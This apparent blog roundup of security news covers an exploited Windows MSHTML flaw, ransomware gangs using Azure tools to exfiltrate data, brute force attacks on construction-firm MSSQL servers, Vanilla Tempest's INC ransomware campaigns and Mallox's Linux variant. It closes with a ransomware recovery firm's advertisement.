CISA Warns of Actively Exploited MSHTML Vulnerability in Windows Systems
The Cybersecurity and Infrastructure Security Agency (CISA) has issued a directive urging federal agencies to patch a critical MSHTML vulnerability (CVE-2024-43461) in Windows, following its exploitation by the Void Banshee APT group. Initially deemed unexploited by Microsoft, this zero-day flaw was confirmed to be used in malware attacks, including the delivery of information-stealing software. The vulnerability allows attackers to execute malicious code through deceptive websites or files, exploiting a flaw in how file extensions are displayed to users. These attacks employed specially crafted HTA files disguised as PDFs, using encoded braille characters to obscure the file type. CISA has added the vulnerability to its Known Exploited Vulnerabilities catalog and set an October 7 deadline for federal systems to be secured. Organizations worldwide are also urged to prioritize patching to mitigate the risk of these targeted attacks.
Ransomware Gangs Exploit Microsoft Azure Tools for Data Exfiltration
Ransomware groups such as BianLian and Rhysida are increasingly leveraging Microsoft’s Azure Storage Explorer and AzCopy tools to steal data from compromised networks. These tools, typically used for managing and transferring large volumes of data in Azure Blob storage, are being exploited to exfiltrate sensitive data to the cloud. According to cybersecurity firm modePUSH, attackers use these tools to upload stolen files to Azure Blob containers, where they can later retrieve them. The process involves setting up dependencies, including upgrading .NET to version 8.
Azure’s status as a trusted service in enterprise environments makes it less likely to be blocked by corporate security systems, allowing ransomware gangs to exfiltrate data without detection. Logs from AzCopy and Storage Explorer provide investigators with vital information on stolen data. Organizations are advised to monitor for these tools’ execution and set alerts for unusual data transfer patterns to mitigate these attacks.
Brute Force Attacks Target Construction Firms Using Accounting Software
Hackers are launching brute force attacks against exposed Foundation accounting servers, which are widely used in the construction industry, to gain access to corporate networks. These attacks, first identified by cybersecurity firm Huntress on September 14, 2024, have affected companies in various sub-industries, including plumbing, HVAC, and concrete. The attackers exploit exposed services and weak, unchanged default credentials, focusing on privileged accounts like ‘sa’ and ‘dba’ in Microsoft SQL Server (MSSQL), which is used by Foundation.
In some cases, attackers have attempted up to 35,000 brute force login attempts in a single hour to crack passwords. Once inside, they use the MSSQL ‘xp_cmdshell’ feature to execute system commands, allowing further compromise. Huntress has detected 33 publicly exposed MSSQL databases vulnerable to these attacks. Administrators are urged to rotate account credentials and close unnecessary public access to safeguard their systems from ongoing brute force attempts.
Vanilla Tempest Leveraging INC Ransomware in Healthcare Attacks
Microsoft has reported that the ransomware affiliate Vanilla Tempest is now using INC ransomware to target U.S. healthcare organizations. This group, active since mid-2021, has a history of deploying various ransomware strains, including BlackCat ransomware, Quantum Locker, Zeppelin, and Rhysida, in attacks across sectors such as healthcare, education, and manufacturing. Recently, Vanilla Tempest has been observed breaching networks with the help of Gootloader malware and deploying INC ransomware after gaining system access.
In a recent healthcare attack, the group used tools like AnyDesk and MEGA synchronization software to facilitate lateral movement before deploying ransomware across the victim’s network. Vanilla Tempest’s history also includes the use of BlackCat ransomware, a notorious strain used in highly targeted operations. The group’s evolving tactics underline the ongoing threat to healthcare systems, which have suffered operational disruptions due to ransomware incidents.
Vanilla Tempest Exploits RDP and Various Ransomware Variants in Healthcare Attacks
Microsoft has identified Vanilla Tempest, a ransomware affiliate, as responsible for recent attacks on U.S. healthcare organizations, utilizing INC ransomware. The group gained access to targeted networks through the Storm-0494 threat actor, leveraging Gootloader malware and exploiting Remote Desktop Protocol (RDP) for lateral movement within compromised systems. Once inside, Vanilla Tempest deployed INC ransomware, causing widespread disruptions.
Known for its versatility, Vanilla Tempest has a history of using various ransomware variants, including BlackCat, Quantum Locker, Zeppelin, and Rhysida. Previously tracked as Vice Society, the group has targeted a range of industries such as healthcare, education, and manufacturing. In this latest healthcare attack, the group’s use of RDP and legitimate tools like AnyDesk further facilitated their malicious activities, underlining the ongoing risk posed by ransomware operations across critical sectors.
Mallox Ransomware Expands with New Linux Variant Based on Leaked Kryptina Code
A Mallox ransomware affiliate has begun using a modified version of the Kryptina ransomware to target Linux systems, marking a shift in the operation’s focus from Windows to Linux and VMware ESXi environments. Known as a Ransomware-as-a-Service (RaaS) operation, Mallox, also referred to as TargetCompany, has adopted this new Linux variant, identified by SentinelLabs, to expand its reach.
Kryptina, originally launched in late 2023 as a low-cost RaaS platform for Linux systems, failed to gain significant traction. However, in February 2024, Kryptina’s source code was leaked on hacking forums by its administrator, “Corlys.” Mallox affiliates have since rebranded this code as “Mallox Linux 1.0,” retaining Kryptina’s AES-256-CBC encryption mechanism and decryption routines. Apart from changes in appearance and ransom note references, the core functionality remains the same.
Mallox’s evolution into Linux-based systems highlights its adaptability within the ransomware ecosystem, signaling broader threats from this RaaS operation.
Conclusion
The increasing sophistication of ransomware operations, such as those involving Vanilla Tempest and Mallox, underscores the urgent need for organizations to strengthen their cybersecurity measures. With attackers exploiting vulnerabilities across multiple platforms, from Windows systems to Linux and VMWare environments, it is critical to stay ahead of these evolving threats.
As specialists in ransomware recovery and cybersecurity, we provide expert Ransomware Recovery Services, Ransomware Negotiation Services, and Ransomware Settlement Services. If your organization has been impacted by ransomware, or if you’re looking to enhance your defenses, contact us today for professional assistance.